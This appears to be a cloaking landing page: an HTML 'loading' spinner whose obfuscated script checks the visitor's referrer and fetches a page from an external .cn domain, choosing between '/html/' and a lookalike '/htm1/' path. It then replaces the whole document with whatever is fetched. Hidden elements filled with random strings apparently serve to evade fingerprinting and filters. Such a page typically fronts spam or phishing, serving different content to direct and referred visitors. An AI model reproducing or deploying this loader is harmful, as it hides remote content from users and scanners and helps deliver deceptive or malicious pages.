<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .agZmsC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .agZmsC .yngUIl4N {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .agZmsC .content {
            line-height: 50px;
            text-align: center
        }

        .agZmsC .img {
            width: 100%
        }

        .agZmsC .ke8N9oZKhq9 {
            text-align: center
        }

        .agZmsC .ke8N9oZKhq9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .agZmsC .ke8N9oZKhq9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .agZmsC .ke8N9oZKhq9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .agZmsC .ke8N9oZKhq9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .agZmsC .ke8N9oZKhq9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .agZmsC .ke8N9oZKhq9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .agZmsC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function SNwPgDjYs9(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var XU6osv = SNwPgDjYs9('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ XU6osv +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ XU6osv +".html?a=share";
		}
		
        ODDrCvaxX=url+"#"+new Date().getTime();
        ODDrCvaxX && function() {
            $.get(ODDrCvaxX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>l36Zn49WuSz3y</p>
<b style='display:none' >o0NM8OZacscbbBVMBkcogjqbwb6Gwv</b>
<span style='display:none'>ZaURacUJ0GPLA7bMAJmYeWy7CzHUhbbbxL</span><div class="agZmsC">
    <div class="yngUIl4N">
        <div class="ke8N9oZKhq9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >plUs00BxwhuklvLjHkHzwJFLltfbIYFDAiMNA5D0rxUmQgV2oKzXZbW9LyiXXT2SN76uovGUpDvZlkKzQgwGg6E2CcTXTMUBoHE</li>
<div style='display:none'>oKKnooCEvltbRaWBLd3OY</div>
<h1 style='display:none' >zQAmyk9QSt4C9lGZxP</h1>
<a  href='#' style='display:none'>v29JtSnCAQbEQZXmQ5xthmMR672K0DB</a>
<li style='display:none' >plUs00BxwhuklvLjHkHzwJFLltfbIYFDAiMNA5D0rxUmQgV2oKzXZbW9LyiXXT2SN76uovGUpDvZlkKzQgwGg6E2CcTXTMUBoHE</li>
<span style='display:none'>WYOzPSHkELmcdb8SnzGaKJPHqwaG9dDmGaigUy5ZEW8zRHdbV0EMcJdh01OYBpxRogm8KgcF8aNr86j8i</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >nYlLx4nLCGz8aEYmFM8bmC1jqR5Nimc7oM5h9dncN8kl7IiW0L6iPfsbKVaYW0hR3NZ</ul></body>
</html>